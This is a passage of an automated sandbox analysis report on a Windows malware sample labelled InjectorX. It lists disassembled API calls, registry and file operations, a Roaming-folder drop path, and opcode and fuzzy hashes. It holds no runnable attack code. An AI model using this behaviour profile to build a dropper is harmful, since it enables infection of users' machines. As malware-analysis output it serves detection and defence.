                                            • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe", xrefs: 00405D6D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-1269705395

                                            Control-flow Graph

                                            control_flow_graph 726 401c19-401c39 call 402c15 * 2 731 401c45-401c49 726->731 732 401c3b-401c42 call 402c37 726->732 734 401c55-401c5b 731->734 735 401c4b-401c52 call 402c37 731->735 732->731 738 401ca9-401cd3 call 402c37 * 2 FindWindowExW 734->738 739 401c5d-401c79 call 402c15 * 2 734->739 735->734 751 401cd9 738->751 749 401c99-401ca7 SendMessageW 739->749 750 401c7b-401c97 SendMessageTimeoutW 739->750 749->751 752 401cdc-401cdf 750->752 751->752 753 401ce5 752->753 754 402abf-402ace 752->754 753->754
                                            APIs
                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971

                                            Control-flow Graph

                                            control_flow_graph 757 4023de-40240f call 402c37 * 2 call 402cc7 764 402415-40241f 757->764 765 402abf-402ace 757->765 766 402421-40242e call 402c37 lstrlenW 764->766 767 402432-402435 764->767 766->767 770 402437-402448 call 402c15 767->770 771 402449-40244c 767->771 770->771 775 40245d-402471 RegSetValueExW 771->775 776 40244e-402458 call 4030fa 771->776 779 402473 775->779 780 402476-402557 RegCloseKey 775->780 776->775 779->780 780->765 782 402885-40288c 780->782 782->765
                                            APIs
                                            • lstrlenW.KERNEL32(sarcoderma,00000023,00000011,00000002), ref: 00402429
                                            • RegSetValueExW.KERNELBASE(?,?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402469
                                            • RegCloseKey.KERNELBASE(?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402551
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CloseValuelstrlen
                                            • String ID: sarcoderma
                                            • API String ID: 2655323295-3317469366
                                            APIs
                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                            • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                            • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Close$Enum
                                            • String ID:
                                            • API String ID: 464197530-0
                                            APIs
                                              • Part of subcall function 00405BC8: CharNextW.USER32(?,?,00425EF0,?,00405C3C,00425EF0,00425EF0,?,?,74DF3420,0040597A,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405BD6
                                              • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                              • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                              • Part of subcall function 0040577F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet,?,00000000,000000F0), ref: 0040164D
                                            Strings
                                            • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet, xrefs: 00401640
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet
                                            • API String ID: 1892508949-192101639
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,0040638E,80000002), ref: 00406160
                                            • RegCloseKey.KERNELBASE(?,?,0040638E,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 0040616B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID: : Completed
                                            • API String ID: 3356406503-2954849223
                                            APIs
                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                            • CloseHandle.KERNEL32(?), ref: 00405867
                                            Strings
                                            • Error launching installer, xrefs: 00405844
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                            • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                            • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                            • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                            • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                            • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                            • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                            • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                            • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                            • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                            • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                            • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                            • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                            • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                            • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                            • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                            • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                            • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                            • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                            • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                            • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                            • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                            APIs
                                            • GlobalFree.KERNEL32(00000000), ref: 00401BE1
                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Global$AllocFree
                                            • String ID: Noncyclical
                                            • API String ID: 3394109436-2594171315
                                            • Opcode ID: 0844196dee18cea9d56a4e77333d8774e68dd74a7cb5739370c83f54557c9c23
                                            • Instruction ID: dcb5b8d847a710274197b3f9eb455299827833f010be51817d6ecb77aa41e574
                                            • Opcode Fuzzy Hash: 0844196dee18cea9d56a4e77333d8774e68dd74a7cb5739370c83f54557c9c23
                                            • Instruction Fuzzy Hash: 5021CD72700100EFDB20EBA8CE8495E76B8AF84328725417BF902F72D1DB7D98518B2D
                                            APIs
                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                            • RegCloseKey.KERNELBASE(?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402551
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Enum$CloseValue
                                            • String ID:
                                            • API String ID: 397863658-0
                                            • Opcode ID: 5fe39f6a887c8af29e07c615d6c30983e444cdbe436708b2e3fcea9e6197479e
                                            • Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
                                            • Opcode Fuzzy Hash: 5fe39f6a887c8af29e07c615d6c30983e444cdbe436708b2e3fcea9e6197479e
                                            • Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69
                                            APIs
                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                            • RegCloseKey.KERNELBASE(?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402551
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID:
                                            • API String ID: 3356406503-0
                                            • Opcode ID: 1159d50a24b9b01b67aa24e1c7db0f716e147c0a3d96e1b9d2c227e5af43628e
                                            • Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
                                            • Opcode Fuzzy Hash: 1159d50a24b9b01b67aa24e1c7db0f716e147c0a3d96e1b9d2c227e5af43628e
                                            • Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A
                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            APIs
                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                            • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CloseDeleteValue
                                            • String ID:
                                            • API String ID: 2831762973-0
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 00405393
                                              • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 004053DF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: InitializeMessageSendUninitialize
                                            • String ID:
                                            • API String ID: 2896919175-0
                                            APIs
                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: Window$EnableShow
                                            • String ID:
                                            • API String ID: 1136574915-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: ShowWindow
                                            • String ID:
                                            • API String ID: 1268545403-0
                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                              • Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                              • Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
                                              • Part of subcall function 004065B6: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D32
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            APIs
                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00405802
                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            APIs
                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: FileMove
                                            • String ID:
                                            • API String ID: 3562171763-0
                                            • Opcode ID: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
                                            • Instruction ID: 3e6e6754c95f31a417227132d94fb2ae884618af556d43a54845cec5a9764f61
                                            • Opcode Fuzzy Hash: 899a71dbaa163dbf6977e9c934095616be92d42723cbf7f9b7c1a2ec6de6a561
                                            • Instruction Fuzzy Hash: 20F02431608114A7CB20BBA54F0DE6F61648F963A8F24073FB011B22E1EABC8902956F
                                            APIs
                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringWrite
                                            • String ID:
                                            • API String ID: 390214022-0
                                            • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                            • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                            • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                            • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                            APIs
                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406110
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                            • Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
                                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                            • Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032F2,00000000,00000000,00403149,?,00000004,00000000,00000000,00000000), ref: 00405DD5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                            • Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                            • Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4
                                            APIs
                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032C0,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E04
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                            • Instruction ID: 615bc9b617cbd9c004defc23c3f46b4eb24d278b47416a1e56efd721f2399a3b
                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                            • Instruction Fuzzy Hash: 1AE0EC3262465AABDF10AF55DC00AEB7B6CFB453A0F004836FD55E3150D671EA219BE8
                                            APIs
                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString
                                            • String ID:
                                            • API String ID: 1096422788-0
                                            • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                            • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                            • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                            • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406147,?,00000000,?,?,: Completed,?), ref: 004060DD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                            • Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                            • Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14
                                            APIs
                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 30cc171b591943f2be269f496ec4946c6c5ef3ac0631ee9b668c6a841e76ff0b
                                            • Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
                                            • Opcode Fuzzy Hash: 30cc171b591943f2be269f496ec4946c6c5ef3ac0631ee9b668c6a841e76ff0b
                                            • Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59
                                            APIs
                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                            • Instruction ID: d07d2c2d8c4880ed0075d79043221f50ab42e2b574db457b7482678080f727f2
                                            • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                            • Instruction Fuzzy Hash: 42C04C717402017BEA208B519D49F1677549790B40F1484797740E50E0D674E450D62C
                                            APIs
                                            • SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                            • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                            • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                            • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                            APIs
                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            APIs
                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                              • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                              • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed), ref: 0040531D
                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                              • Part of subcall function 00405831: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                              • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                              • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
                                              • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670A
                                              • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Similarity
                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                            • String ID:
                                            • API String ID: 2972824698-0
                                            APIs
